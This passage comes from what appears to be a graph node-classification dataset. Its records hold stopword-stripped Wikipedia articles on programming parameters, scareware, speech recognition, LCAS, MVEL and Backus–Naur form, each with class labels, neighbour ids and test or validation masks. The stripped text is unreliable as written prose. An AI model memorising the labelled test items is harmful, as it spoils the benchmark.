    "text": "Parameter_(computer_programming):parameter computer programming computer programming parameter formal argument special kind variable used subroutine refer one pieces data provided input subroutine pieces data values arguments often called actual arguments actual parameters subroutine going called/invoked ordered list parameters usually included definition subroutine time subroutine called arguments call evaluated resulting values assigned corresponding parameters unlike argument usual mathematical usage argument computer science thus actual input expression passed/supplied function procedure routine invocation/call statement whereas parameter variable inside implementation subroutine example one defines codice_1 subroutine codice_2 codice_3 parameters called codice_4 codice_5 arguments note variables expressions thereof calling context arguments subroutine called codice_6 variables codice_7 arguments values codice_5 see parameters arguments section information common case call value parameter acts within subroutine new local variable initialized value argument local isolated copy argument argument variable cases e.g call reference argument variable supplied caller affected actions within called subroutine discussed evaluation strategy semantics parameters declared value arguments passed parameters subroutines defined language details represented particular computer system depend calling conventions system following program c programming language defines function named salestax one parameter named price type price double i.e double-precision floating point number function return type also double function defined invoked follows example function invoked argument 10.00 happens 10.00 assigned price function begins calculating result steps producing result specified enclosed codice_9 indicates first thing multiply 0.05 value price gives 0.50. codice_10 means function produce result codice_9 therefore final result ignoring possible round-off errors one encounters representing decimal fractions binary fractions 0.50 terms parameter argument may different meanings different programming languages sometimes used interchangeably context used distinguish meaning term parameter sometimes called formal parameter often used refer variable found function definition argument sometimes called actual parameter refers actual input supplied function call example one defines function codice_12 codice_13 parameter called codice_14 codice_15 argument parameter unbound variable argument value variable complex expression involving values variables case call value passed function value argument – example codice_16 codice_17 equivalent calls – call reference variable argument passed reference variable even though syntax function call could stay specification pass-by-reference pass-by-value would made function declaration and/or definition parameters appear procedure definitions arguments appear procedure calls function definition codice_18 variable x parameter function call codice_16 value 2 argument function loosely parameter type argument instance parameter intrinsic property procedure included definition example many languages procedure add two supplied integers together calculate sum would need two parameters one integer general procedure may defined number parameters parameters procedure parameters part definition specifies parameters called parameter list contrast arguments expressions supplied procedure called usually one expression matching one parameters unlike parameters form unchanging part procedure definition arguments may vary call call time procedure called part procedure call specifies arguments called argument list although parameters also commonly referred arguments arguments sometimes thought actual values references assigned parameter variables subroutine called run-time discussing code calling subroutine values references passed subroutine arguments place code values references given parameter list discussing code inside subroutine definition variables subroutine parameter list parameters values parameters runtime arguments example c dealing threads common pass argument type void* cast expected type better understand difference consider following function written c function sum two parameters named addend1 addend2 adds values passed parameters returns result subroutine caller using technique automatically supplied c compiler code calls sum function might look like variables value1 value2 initialized values value1 value2 arguments sum function context runtime values assigned variables passed function sum arguments sum function parameters addend1 addend2 evaluated yielding arguments 40 2 respectively values arguments added result returned caller assigned variable sum_value difference parameters arguments possible supply inappropriate arguments procedure call may supply many arguments one arguments may wrong type arguments may supplied wrong order situations causes mismatch parameter argument lists procedure often return unintended answer generate runtime error within eiffel software development method language terms argument parameter distinct uses established convention term argument used exclusively reference routine inputs term parameter used exclusively type parameterization generic classes consider following routine definition routine codice_20 takes two arguments codice_21 codice_22 called routine formal arguments call codice_20 specifies actual arguments shown codice_24 codice_25 parameters also thought either formal actual formal generic parameters used definition generic classes example class codice_26 declared generic class two formal generic parameters codice_27 representing data interest codice_28 representing hash key data class hash_table g k hashable class becomes client codice_26 formal generic parameters substituted actual generic parameters generic derivation following attribute declaration codice_30 used character string based dictionary data key formal generic parameters substituted actual generic parameters type codice_31 strongly typed programming languages parameter type must specified procedure declaration languages using type inference attempt discover types automatically function body usage dynamically typed programming languages defer type resolution run-time weakly typed languages perform little type resolution relying instead programmer correctness languages use special keyword e.g void indicate subroutine parameters formal type theory functions take empty parameter list whose type void rather unit exact mechanism assigning arguments parameters called argument passing depends upon evaluation strategy used parameter typically call value may specified using keywords programming languages ada c++ clojure common lisp fortran 90 python ruby tcl windows powershell allow default argument explicitly implicitly given subroutine declaration allows caller omit argument calling subroutine default argument explicitly given value used provided caller default argument implicit sometimes using keyword optional language provides well-known value null empty zero empty string etc value provided caller powershell example default arguments seen special case variable-length argument list languages allow subroutines defined accept variable number arguments languages subroutines must iterate list arguments powershell example programming languages—such ada windows powershell—allow subroutines named parameters allows calling code self-documenting also provides flexibility caller often allowing order arguments changed arguments omitted needed powershell example lambda calculus function exactly one parameter thought functions multiple parameters usually represented lambda calculus function takes first argument returns function takes rest arguments transformation known currying programming languages like ml haskell follow scheme languages every function exactly one parameter may look like definition function multiple parameters actually syntactic sugar definition function returns function etc function application left-associative languages well lambda calculus looks like application function multiple arguments correctly evaluated function applied first argument resulting function applied second argument etc output parameter also known parameter return parameter parameter used output rather usual use input using call reference parameters call value parameters value reference output parameters idiom languages notably c c++ languages built-in support output parameters languages built-in support output parameters include ada see fortran since fortran 90 see various procedural extensions sql pl/sql see pl/sql functions transact-sql c .net framework swift scripting language tscript see tscript function declarations precisely one may distinguish three types parameters parameter modes output parameters often denoted codice_32 codice_33 codice_34 codice_35 input argument argument input parameter must value initialized variable literal must redefined assigned output argument must assignable variable need initialized existing value accessible must assigned value input/output argument must initialized assignable variable optionally assigned value exact requirements enforcement vary languages – example ada 83 output parameters assigned read even assignment removed ada 95 remove need auxiliary accumulator variable analogous notion value expression r-value value l-value assigned r-value/l-value value assigned respectively though terms specialized meanings c. cases input input/output distinguished output considered specific use input/output cases input output input/output supported default mode varies languages fortran 90 input/output default c sql extensions input default tscript parameter explicitly specified input output syntactically parameter mode generally indicated keyword function declaration codice_36 c conventionally output parameters often put end parameter list clearly distinguish though always followed tscript uses different approach function declaration input parameters listed output parameters separated colon return type function function computes size text fragment parameter modes form denotational semantics stating programmer intent allowing compilers catch errors apply optimizations – necessarily imply operational semantics parameter passing actually occurs notably input parameters implemented call value output input/output parameters call reference – straightforward way implement modes languages without built-in support – always implemented distinction discussed detail ada '83 rationale emphasizes parameter mode abstracted parameter passing mechanism reference copy actually implemented instance c input parameters default keyword passed value output input/output parameters codice_33 codice_38 passed reference pl/sql input parameters codice_39 passed reference output input/output parameters codice_40 codice_41 default passed value result copied back passed reference using codice_42 compiler hint syntactically similar construction output parameters assign return value variable name function found pascal fortran 66 fortran 77 pascal example semantically different called function simply evaluated – passed variable calling scope store output primary use output parameters return multiple values function use input/output parameters modify state using parameter passing rather shared environment global variables important use returning multiple values solve semipredicate problem returning value error status – see semipredicate problem multivalued return example return two variables function c one may write codice_13 input parameter codice_44 codice_45 output parameters common use case c related languages exception handling function places return value output variable returns boolean corresponding whether function succeeded archetypal example codice_46 method .net especially c parses string integer returning codice_47 success codice_48 failure following signature may used follows similar considerations apply returning value one several possible types return value specify type value stored one several output variables output parameters often discouraged modern programming essentially awkward confusing low-level – commonplace return values considerably easier understand work notably output parameters involve functions side effects modifying output parameter semantically similar references confusing pure functions values distinction output parameters input/output parameters subtle since common programming styles parameters simply input parameters output parameters input/output parameters unusual hence susceptible misunderstanding output input/output parameters prevent function composition since output stored variables rather value expression thus one must initially declare variable step chain functions must separate statement example c++ following function composition written output input/output parameters instead becomes codice_49 output parameter codice_27 input/output parameter special case function single output input/output parameter return value function composition possible output input/output parameter c/c++ address also returned function case becomes various alternatives use cases output parameters returning multiple values function alternative return tuple syntactically clearer automatic sequence unpacking parallel assignment used go python returning value one several types tagged union used instead common cases nullable types option types return value null indicate failure exception handling one return nullable type raise exception example python one might either idiomatically micro-optimization requiring local variable copying return using output variables also applied conventional functions return values sufficiently sophisticated compilers usual alternative output parameters c related languages return single data structure containing return values example given structure encapsulating width height one write object-oriented languages instead using input/output parameters one often use call sharing passing reference object mutating object though changing object variable refers",
    "neighbors": [
      3462,
      2062,
      655,
      6160,
      9875,
      7193,
      1435,
      9245,
      3876,
      5031,
      428,
      10413,
      692,
      3767,
      8504,
      5945,
      2106,
      10043,
      6717,
      5059,
      10435,
      8262,
      74,
      8524,
      335,
      7292,
      7889,
      467,
      7894,
      7386,
      4320,
      8293,
      9701,
      8554,
      7147,
      240,
      6640,
      3573,
      119,
      3960,
      380,
      2045,
      6398
    ],
    "mask": "Test"
  },
  {
    "node_id": 10556,
    "label": 4,
    "text": "Personal_Internet_Security_2011:personal internet security 2011 personal internet security 2011 scareware rogue anti-virus fake computer protection program induces users think number viruses personal internet security fact virus program encourages users pay certain amount subscription clean computers protect computers users also notice different number viruses listed every time virus pops",
    "neighbors": [
      4165,
      9287,
      7515,
      1013,
      3320,
      7739
    ],
    "mask": "Test"
  },
  {
    "node_id": 10557,
    "label": 0,
    "text": "Speech_recognition:speech recognition speech recognition interdisciplinary subfield computational linguistics develops methodologies technologies enables recognition translation spoken language text computers also known automatic speech recognition asr computer speech recognition speech text stt incorporates knowledge research linguistics computer science electrical engineering fields speech recognition systems require training also called enrollment individual speaker reads text isolated vocabulary system system analyzes person specific voice uses fine-tune recognition person speech resulting increased accuracy systems use training called speaker independent systems systems use training called speaker dependent speech recognition applications include voice user interfaces voice dialing e.g call home call routing e.g would like make collect call domotic appliance control search e.g find podcast particular words spoken simple data entry e.g. entering credit card number preparation structured documents e.g radiology report determining speaker characteristics speech-to-text processing e.g. word processors emails aircraft usually termed direct voice input term voice recognition speaker identification refers identifying speaker rather saying recognizing speaker simplify task translating speech systems trained specific person voice used authenticate verify identity speaker part security process technology perspective speech recognition long history several waves major innovations recently field benefited advances deep learning big data advances evidenced surge academic papers published field importantly worldwide industry adoption variety deep learning methods designing deploying speech recognition systems key areas growth vocabulary size speaker independence processing speed raj reddy first person take continuous speech recognition graduate student stanford university late 1960s previous systems required users pause word reddy system issued spoken commands playing game chess around time soviet researchers invented dynamic time warping dtw algorithm used create recognizer capable operating 200-word vocabulary dtw processed speech dividing short frames e.g 10ms segments processing frame single unit although dtw would superseded later algorithms technique carried achieving speaker independence remained unsolved time period late 1960s leonard baum developed mathematics markov chains institute defense analysis decade later cmu raj reddy students james baker janet m. baker began using hidden markov model hmm speech recognition james baker learned hmms summer job institute defense analysis undergraduate education use hmms allowed researchers combine different sources knowledge acoustics language syntax unified probabilistic model 1980s also saw introduction n-gram language model much progress field owed rapidly increasing capabilities computers end darpa program 1976 best computer available researchers pdp-10 4 mb ram could take 100 minutes decode 30 seconds speech two practical products point vocabulary typical commercial speech recognition system larger average human vocabulary raj reddy former student xuedong huang developed sphinx-ii system cmu sphinx-ii system first speaker-independent large vocabulary continuous speech recognition best performance darpa 1992 evaluation handling continuous speech large vocabulary major milestone history speech recognition huang went found speech recognition group microsoft 1993 raj reddy student kai-fu lee joined apple 1992 helped develop speech interface prototype apple computer known casper lernout hauspie belgium-based speech recognition company acquired several companies including kurzweil applied intelligence 1997 dragon systems 2000 l h speech technology used windows xp operating system l h industry leader accounting scandal brought end company 2001 speech technology l h bought scansoft became nuance 2005 apple originally licensed software nuance provide speech recognition capability digital assistant siri 2000s darpa sponsored two speech recognition programs effective affordable reusable speech-to-text ears 2002 global autonomous language exploitation gale four teams participated ears program ibm team led bbn limsi univ pittsburgh cambridge university team composed icsi sri university washington ears funded collection switchboard telephone speech corpus containing 260 hours recorded conversations 500 speakers gale program focused arabic mandarin broadcast news speech google first effort speech recognition came 2007 hiring researchers nuance first product goog-411 telephone based directory service recordings goog-411 produced valuable data helped google improve recognition systems google voice search supported 30 languages united states national security agency made use type speech recognition keyword spotting since least 2006 technology allows analysts search large volumes recorded conversations isolate mentions keywords recordings indexed analysts run queries database find conversations interest government research programs focused intelligence applications speech recognition e.g darpa ears program iarpa babel program early 2000s speech recognition still dominated traditional approaches hidden markov models combined feedforward artificial neural networks today however many aspects speech recognition taken deep learning method called long short-term memory lstm recurrent neural network published sepp hochreiter jürgen schmidhuber 1997 lstm rnns avoid vanishing gradient problem learn deep learning tasks require memories events happened thousands discrete time steps ago important speech around 2007 lstm trained connectionist temporal classification ctc started outperform traditional speech recognition certain applications 2015 google speech recognition reportedly experienced dramatic performance jump 49 ctc-trained lstm available google voice smartphone users use deep feedforward non-recurrent networks acoustic modeling introduced later part 2009 geoffrey hinton students university toronto li deng colleagues microsoft research initially collaborative work microsoft university toronto subsequently expanded include ibm google hence shared views four research groups subtitle 2012 review paper microsoft research executive called innovation dramatic change accuracy since 1979 contrast steady incremental improvements past decades application deep learning decreased word error rate 30 innovation quickly adopted across field researchers begun use deep learning techniques language modeling well long history speech recognition shallow form deep form e.g recurrent nets artificial neural networks explored many years 1980s 1990s years 2000s methods never non-uniform internal-handcrafting gaussian mixture model/hidden markov model gmm-hmm technology based generative models speech trained discriminatively number key difficulties methodologically analyzed 1990s including gradient diminishing weak temporal correlation structure neural predictive models difficulties addition lack big training data big computing power early days speech recognition researchers understood barriers hence subsequently moved away neural nets pursue generative modeling approaches recent resurgence deep learning starting around 2009–2010 overcome difficulties hinton et al deng et al reviewed part recent history collaboration colleagues across four groups university toronto microsoft google ibm ignited renaissance applications deep feedforward neural networks speech recognition early 2010s speech recognition also called voice recognition clearly differentiated speaker recognition speaker independence considered major breakthrough systems required training period 1987 ad doll carried tagline finally doll understands – despite fact described children could train respond voice 2017 microsoft researchers reached historical human parity milestone transcribing conversational telephony speech widely benchmarked switchboard task multiple deep learning models used optimize speech recognition accuracy speech recognition word error rate reported low 4 professional human transcribers working together benchmark funded ibm watson speech team task acoustic modeling language modeling important parts modern statistically-based speech recognition algorithms hidden markov models hmms widely used many systems language modeling also used many natural language processing applications document classification statistical machine translation modern general-purpose speech recognition systems based hidden markov models statistical models output sequence symbols quantities hmms used speech recognition speech signal viewed piecewise stationary signal short-time stationary signal short time-scale e.g. 10 milliseconds speech approximated stationary process speech thought markov model many stochastic purposes another reason hmms popular trained automatically simple computationally feasible use speech recognition hidden markov model would output sequence n -dimensional real-valued vectors n small integer 10 outputting one every 10 milliseconds vectors would consist cepstral coefficients obtained taking fourier transform short time window speech decorrelating spectrum using cosine transform taking first significant coefficients hidden markov model tend state statistical distribution mixture diagonal covariance gaussians give likelihood observed vector word general speech recognition systems phoneme different output distribution hidden markov model sequence words phonemes made concatenating individual trained hidden markov models separate words phonemes described core elements common hmm-based approach speech recognition modern speech recognition systems use various combinations number standard techniques order improve results basic approach described typical large-vocabulary system would need context dependency phonemes phonemes different left right context different realizations hmm states would use cepstral normalization normalize different speaker recording conditions speaker normalization might use vocal tract length normalization vtln male-female normalization maximum likelihood linear regression mllr general speaker adaptation features would so-called delta delta-delta coefficients capture speech dynamics addition might use heteroscedastic linear discriminant analysis hlda might skip delta delta-delta coefficients use splicing lda-based projection followed perhaps heteroscedastic linear discriminant analysis global semi-tied co variance transform also known maximum likelihood linear transform mllt many systems use so-called discriminative training techniques dispense purely statistical approach hmm parameter estimation instead optimize classification-related measure training data examples maximum mutual information mmi minimum classification error mce minimum phone error mpe decoding speech term happens system presented new utterance must compute likely source sentence would probably use viterbi algorithm find best path choice dynamically creating combination hidden markov model includes acoustic language model information combining statically beforehand finite state transducer fst approach possible improvement decoding keep set good candidates instead keeping best candidate use better scoring function scoring rate good candidates may pick best one according refined score set candidates kept either list n-best list approach subset models lattice scoring usually done trying minimize bayes risk approximation thereof instead taking source sentence maximal probability try take sentence minimizes expectancy given loss function regards possible transcriptions i.e. take sentence minimizes average distance possible sentences weighted estimated probability loss function usually levenshtein distance though different distances specific tasks set possible transcriptions course pruned maintain tractability efficient algorithms devised score lattices represented weighted finite state transducers edit distances represented finite state transducer verifying certain assumptions dynamic time warping approach historically used speech recognition largely displaced successful hmm-based approach dynamic time warping algorithm measuring similarity two sequences may vary time speed instance similarities walking patterns would detected even one video person walking slowly another walking quickly even accelerations deceleration course one observation dtw applied video audio graphics – indeed data turned linear representation analyzed dtw well-known application automatic speech recognition cope different speaking speeds general method allows computer find optimal match two given sequences e.g. time series certain restrictions sequences warped non-linearly match sequence alignment method often used context hidden markov models neural networks emerged attractive acoustic modeling approach asr late 1980s since neural networks used many aspects speech recognition phoneme classification isolated word recognition audiovisual speech recognition audiovisual speaker recognition speaker adaptation neural networks make fewer explicit assumptions feature statistical properties hmms several qualities making attractive recognition models speech recognition used estimate probabilities speech feature segment neural networks allow discriminative training natural efficient manner however spite effectiveness classifying short-time units individual phonemes isolated words early neural networks rarely successful continuous recognition tasks limited ability model temporal dependencies one approach limitation use neural networks pre-processing feature transformation dimensionality reduction step prior hmm based recognition however recently lstm related recurrent neural networks rnns time delay neural networks tdnn demonstrated improved performance area deep neural networks denoising autoencoders also investigation deep feedforward neural network dnn artificial neural network multiple hidden layers units input output layers similar shallow neural networks dnns model complex non-linear relationships dnn architectures generate compositional models extra layers enable composition features lower layers giving huge learning capacity thus potential modeling complex patterns speech data success dnns large vocabulary speech recognition occurred 2010 industrial researchers collaboration academic researchers large output layers dnn based context dependent hmm states constructed decision trees adopted recent overview articles one fundamental principle deep learning away hand-crafted feature engineering use raw features principle first explored successfully architecture deep autoencoder raw spectrogram linear filter-bank features showing superiority mel-cepstral features contain stages fixed transformation spectrograms true raw features speech waveforms recently shown produce excellent larger-scale speech recognition results since 2014 much research interest end-to-end asr traditional phonetic-based i.e. hmm-based model approaches required separate components training pronunciation acoustic language model end-to-end models jointly learn components speech recognizer valuable since simplifies training process deployment process example n-gram language model required hmm-based systems typical n-gram language model often takes several gigabytes memory making impractical deploy mobile devices consequently modern commercial asr systems google apple 2017 deployed cloud require network connection opposed device locally first attempt end-to-end asr connectionist temporal classification ctc -based systems introduced alex graves google deepmind navdeep jaitly university toronto 2014 model consisted recurrent neural networks ctc layer jointly rnn-ctc model learns pronunciation acoustic model together however incapable learning language due conditional independence assumptions similar hmm consequently ctc models directly learn map speech acoustics english characters models make many common spelling mistakes must rely separate language model clean transcripts later baidu expanded work extremely large datasets demonstrated commercial success chinese mandarin english 2016 university oxford presented lipnet first end-to-end sentence-level lip reading model using spatiotemporal convolutions coupled rnn-ctc architecture surpassing human-level performance restricted grammar dataset large-scale cnn-rnn-ctc architecture presented 2018 google deepmind achieving 6 times better performance human experts alternative approach ctc-based models attention-based models attention-based asr models introduced simultaneously chan et al carnegie mellon university google brain bahdanau et al university montreal 2016 model named listen attend spell las literally listens acoustic signal pays attention different parts signal spells transcript one character time unlike ctc-based models attention-based models conditional-independence assumptions learn components speech recognizer including pronunciation acoustic language model directly means deployment need carry around language model making practical deployment onto applications limited memory end 2016 attention-based models seen considerable success including outperforming ctc models without external language model various extensions proposed since original las model latent sequence decompositions lsd proposed carnegie mellon university mit google brain directly emit sub-word units natural english characters university oxford google deepmind extended las watch listen attend spell wlas handle lip reading surpassing human-level performance typically manual control input example means finger control steering-wheel enables speech recognition system signalled driver audio prompt following audio prompt system listening window may accept speech input recognition simple voice commands may used initiate phone calls select radio stations play music compatible smartphone mp3 player music-loaded flash drive voice recognition capabilities vary car make model recent car models offer natural-language speech recognition place fixed set commands allowing driver use full sentences common phrases systems therefore need user memorize set fixed command words health care sector speech recognition implemented front-end back-end medical documentation process front-end speech recognition provider dictates speech-recognition engine recognized words displayed spoken dictator responsible editing signing document back-end deferred speech recognition provider dictates digital dictation system voice routed speech-recognition machine recognized draft document routed along original voice file editor draft edited report finalized deferred speech recognition widely used industry currently one major issues relating use speech recognition healthcare american recovery reinvestment act 2009 arra provides substantial financial benefits physicians utilize emr according meaningful use standards standards require substantial amount data maintained emr commonly referred electronic health record ehr use speech recognition naturally suited generation narrative text part radiology/pathology interpretation progress note discharge summary ergonomic gains using speech recognition enter structured discrete data e.g. numeric values codes list controlled vocabulary relatively minimal people sighted operate keyboard mouse significant issue ehrs expressly tailored take advantage voice-recognition capabilities large part clinician interaction ehr involves navigation user interface using menus tab/button clicks heavily dependent keyboard mouse voice-based navigation provides modest ergonomic benefits contrast many highly customized systems radiology pathology dictation implement voice macros use certain phrases – e.g. normal report automatically fill large number default values and/or generate boilerplate vary type exam – e.g. chest x-ray vs. gastrointestinal contrast series radiology system alternative navigation hand cascaded use speech recognition information extraction studied way fill handover form clinical proofing sign-off results encouraging paper also opens data together related performance benchmarks processing software research development community studying clinical documentation language-processing prolonged use speech recognition software conjunction word processors shown benefits short-term-memory restrengthening brain avm patients treated resection research needs conducted determine cognitive benefits individuals whose avms treated using radiologic techniques substantial efforts devoted last decade test evaluation speech recognition fighter aircraft particular note us program speech recognition advanced fighter technology integration afti /f-16 aircraft f-16 vista program france mirage aircraft programs uk dealing variety aircraft platforms programs speech recognizers operated successfully fighter aircraft applications including setting radio frequencies commanding autopilot system setting steer-point coordinates weapons release parameters controlling flight display working swedish pilots flying jas-39 gripen cockpit englund 2004 found recognition deteriorated increasing g-loads report also concluded adaptation greatly improved results cases introduction models breathing shown improve recognition scores significantly contrary might expected effects broken english speakers found evident spontaneous speech caused problems recognizer might expected restricted vocabulary proper syntax could thus expected improve recognition accuracy substantially eurofighter typhoon currently service uk raf employs speaker-dependent system requiring pilot create template system used safety-critical weapon-critical tasks weapon release lowering undercarriage used wide range cockpit functions voice commands confirmed visual and/or aural feedback system seen major design feature reduction pilot workload even allows pilot assign targets aircraft two simple voice commands wingmen five commands speaker-independent systems also developed test f35 lightning ii jsf alenia aermacchi m-346 master lead-in fighter trainer systems produced word accuracy scores excess 98 problems achieving high recognition accuracy stress noise pertain strongly helicopter environment well jet fighter environment acoustic noise problem actually severe helicopter environment high noise levels also helicopter pilot general wear facemask would reduce acoustic noise microphone substantial test evaluation programs carried past decade speech recognition systems applications helicopters notably u.s. army avionics research development activity avrada royal aerospace establishment rae uk work france included speech recognition puma helicopter also much useful work canada results encouraging voice applications included control communication radios setting navigation systems control automated target handover system fighter applications overriding issue voice helicopters impact pilot effectiveness encouraging results reported avrada tests although represent feasibility demonstration test environment much remains done speech recognition overall speech technology order consistently achieve performance improvements operational settings training air traffic controllers atc represents excellent application speech recognition systems many atc training systems currently require person act pseudo-pilot engaging voice dialog trainee controller simulates dialog controller would conduct pilots real atc situation speech recognition synthesis techniques offer potential eliminate need person act pseudo-pilot thus reducing training support personnel theory air controller tasks also characterized highly structured speech primary output controller hence reducing difficulty speech recognition task possible practice rarely case faa document 7110.65 details phrases used air traffic controllers document gives less 150 examples phrases number phrases supported one simulation vendors speech recognition systems excess 500,000 usaf usmc us army us navy faa well number international atc training organizations royal australian air force civil aviation authorities italy brazil canada currently using atc simulators speech recognition number different vendors asr commonplace field telephony becoming widespread field computer gaming simulation telephony systems asr predominantly used contact centers integrating ivr systems despite high level integration word processing general personal computing field document production asr seen expected increases use improvement mobile processor speeds made speech recognition practical smartphones speech used mostly part user interface creating predefined custom speech commands language learning speech recognition useful learning second language teach proper pronunciation addition helping person develop fluency speaking skills students blind see blindness education low vision benefit using technology convey words hear computer recite well use computer commanding voice instead look screen keyboard students physically disabled suffer repetitive strain injury/other injuries upper extremities relieved worry handwriting typing working scribe school assignments using speech-to-text programs also utilize speech recognition technology freely enjoy searching internet using computer home without physically operate mouse keyboard speech recognition allow students learning disabilities become better writers saying words aloud increase fluidity writing alleviated concerns regarding spelling punctuation mechanics writing also see learning disability use voice recognition software conjunction digital audio recorder personal computer running word-processing software proven positive restoring damaged short-term-memory capacity stroke craniotomy individuals people disabilities benefit speech recognition programs individuals deaf hard hearing speech recognition software used automatically generate closed-captioning conversations discussions conference rooms classroom lectures and/or religious services speech recognition also useful people difficulty using hands ranging mild repetitive stress injuries involve disabilities preclude using conventional computer input devices fact people used keyboard lot developed rsi became urgent early market speech recognition speech recognition used deaf telephony voicemail text relay services captioned telephone individuals learning disabilities problems thought-to-paper communication essentially think idea processed incorrectly causing end differently paper possibly benefit software technology bug proof also whole idea speak text hard intellectually disabled person due fact rare anyone tries learn technology teach person disability type technology help dyslexia disabilities still question effectiveness product problem hindering effective although kid may able say word depending clear say technology may think saying another word input wrong one giving work fix causing take time fixing wrong word performance speech recognition systems usually evaluated terms accuracy speed accuracy usually rated word error rate wer whereas speed measured real time factor measures accuracy include single word error rate swer command success rate csr speech recognition machine complex problem however vocalizations vary terms accent pronunciation articulation roughness nasality pitch volume speed speech distorted background noise echoes electrical characteristics accuracy speech recognition may vary following mentioned earlier article accuracy speech recognition may vary depending following factors discontinuous speech full sentences separated silence used therefore becomes easier recognize speech well isolated speech continuous speech naturally spoken sentences used therefore becomes harder recognize speech different isolated discontinuous speech constraints often represented grammar speech recognition multi-levelled pattern recognition task e.g known word pronunciations legal word sequences compensate errors uncertainties lower level telephone speech sampling rate 8000 samples per second computed every 10 ms one 10 ms section called frame analysis four-step neural network approaches explained information sound produced air medium vibration register ears machines receivers basic sound creates wave two descriptions amplitude strong frequency often vibrates per second speech recognition become means attack theft accidental operation example activation words like alexa spoken audio video broadcast cause devices homes offices start listening input inappropriately possibly take unwanted action voice-controlled devices also accessible visitors building even outside building heard inside attackers may able gain access personal information like calendar address book contents private messages documents may also able impersonate user send messages make online purchases two attacks demonstrated use artificial sounds one transmits ultrasound attempt send commands without nearby people noticing adds small inaudible distortions speech music specially crafted confuse specific speech recognition system recognizing music speech make sounds like one command human sound like different command system popular speech recognition conferences held year two include speechtek speechtek europe icassp interspeech/eurospeech ieee asru conferences field natural language processing acl naacl emnlp hlt beginning include papers speech processing important journals include ieee transactions speech audio processing later renamed ieee transactions audio speech language processing since sept 2014 renamed ieee/acm transactions audio speech language processing—after merging acm publication computer speech language speech communication books like fundamentals speech recognition lawrence rabiner useful acquire basic knowledge may fully date 1993 another good source statistical methods speech recognition frederick jelinek spoken language processing 2001 xuedong huang etc computer speech manfred r. schroeder second edition published 2004 speech processing dynamic optimization-oriented approach published 2003 li deng doug o'shaughnessey updated textbook speech language processing 2008 jurafsky martin presents basics state art asr speaker recognition also uses features front-end processing classification techniques done speech recognition comprehensive textbook fundamentals speaker recognition depth source date details theory practice good insight techniques used best modern systems gained paying attention government sponsored evaluations organised darpa largest speech recognition-related project ongoing 2007 gale project involves speech recognition translation components good accessible introduction speech recognition technology history provided general audience book voice machine building computers understand speech roberto pieraccini 2012 recent book speech recognition automatic speech recognition deep learning approach publisher springer written microsoft researchers d. yu l. deng published near end 2014 highly mathematically oriented technical detail deep learning methods derived implemented modern speech recognition systems based dnns related deep learning methods related book published earlier 2014 deep learning methods applications l. deng d. yu provides less technical methodology-focused overview dnn-based speech recognition 2009–2014 placed within general context deep learning applications including speech recognition also image recognition natural language processing information retrieval multimodal processing multitask learning terms freely available resources carnegie mellon university sphinx toolkit one place start learn speech recognition start experimenting another resource free copyrighted htk book accompanying htk toolkit recent state-of-the-art techniques kaldi toolkit used 2017 mozilla launched open source project called common voice gather big database voices would help build free speech recognition project deepspeech available free github using google open source platform tensorflow commercial cloud based speech recognition apis broadly available aws azure ibm gcp demonstration on-line speech recognizer available cobalt webpage software resources see list speech recognition software",
    "neighbors": [
      5122,
      519,
      2059,
      5648,
      1044,
      7700,
      4632,
      538,
      10794,
      4652,
      7724,
      4662,
      3127,
      1083,
      6715,
      3646,
      6208,
      9798,
      5197,
      6223,
      3664,
      10320,
      6748,
      1633,
      7780,
      4092,
      3698,
      6789,
      4744,
      651,
      6798,
      1169,
      4768,
      6825,
      9898,
      2221,
      5807,
      9406,
      6336,
      5315,
      7887,
      2259,
      10452,
      214,
      2263,
      6362,
      2273,
      5857,
      8427,
      7918,
      8440,
      3323,
      8978,
      11538,
      5399,
      8474,
      4381,
      11549,
      10743,
      9017,
      3389,
      3902,
      8514,
      9035,
      8538,
      1890,
      2921,
      3946,
      4461,
      8046,
      4995,
      2440,
      8080,
      1945,
      4509,
      3998,
      1443,
      7599,
      4531,
      2488,
      6088,
      3533,
      11221,
      2518,
      10207,
      8688,
      10231,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 10558,
    "label": 5,
    "text": "Link_Capacity_Adjustment_Scheme:link capacity adjustment scheme link capacity adjustment scheme lcas method dynamically increase decrease bandwidth virtual concatenated containers lcas protocol specified itu-t g.7042 allows on-demand increase decrease bandwidth virtual concatenated group hitless manner brings bandwidth-on-demand capability data clients like ethernet mapped tdm containers lcas also able temporarily remove failed members virtual concatenation group failed member automatically cause decrease bandwidth repair bandwidth increase hitless fashion together diverse routing provides survivability data traffic without requiring excess protection bandwidth allocation",
    "neighbors": [
      3168,
      2668,
      7478,
      7407
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10559,
    "label": 9,
    "text": "MVEL:mvel mvflex expression language mvel hybrid dynamic/statically typed embeddable expression language runtime java platform originally started utility language application framework project developed completely independently mvel typically used exposing basic logic end-users programmers configuration xml files annotations may also used parse simple javabean expressions runtime allows mvel expressions executed either interpretively pre-compilation process support runtime bytecode generation remove overhead since mvel meant augment java-based software borrows syntax directly java programming language minor differences additional capabilities example side effect mvel typing model treats class method references regular variables possible use class function pointers static methods mvel also allows collections represented folds projections lisp-like syntax mvel relies java namespaces classes possess ability declare namespaces classes example quicksort algorithm implemented mvel 2.0 demonstrating scripting capabilities language",
    "neighbors": [
      6502,
      1095,
      8262,
      5612,
      5677,
      7983,
      3413,
      9590,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 10560,
    "label": 9,
    "text": "Backus–Naur_form:backus–naur form computer science backus–naur form backus normal form bnf notation technique context-free grammars often used describe syntax languages used computing computer programming languages document formats instruction sets communication protocols applied wherever exact descriptions languages needed instance official language specifications manuals textbooks programming language theory many extensions variants original backus–naur notation used exactly defined including extended backus–naur form ebnf augmented backus–naur form abnf idea describing structure language using rewriting rules traced back least work pāṇini ancient indian sanskrit grammarian revered scholar hinduism lived sometime 7th 4th century bce notation describe sanskrit word structure notation equivalent power backus many similar properties western society grammar long regarded subject teaching rather scientific study descriptions informal targeted practical usage first half 20th century linguists leonard bloomfield zellig harris started attempts formalize description language including phrase structure meanwhile string rewriting rules formal logical systems introduced studied mathematicians axel thue 1914 emil post 1920s–40s alan turing 1936 noam chomsky teaching linguistics students information theory mit combined linguistics mathematics taking essentially thue formalism basis description syntax natural language also introduced clear distinction generative rules context-free grammars transformation rules 1956 john backus programming language designer ibm proposed metalanguage metalinguistic formulas describe syntax new programming language ial known today algol 58 1959 notation first used algol 60 report bnf notation chomsky context-free grammars apparently backus familiar chomsky work proposed backus formula defined classes whose names enclosed angle brackets example codice_1 names denotes class basic symbols development algol led algol 60 committee 1963 report peter naur called backus notation backus normal form donald 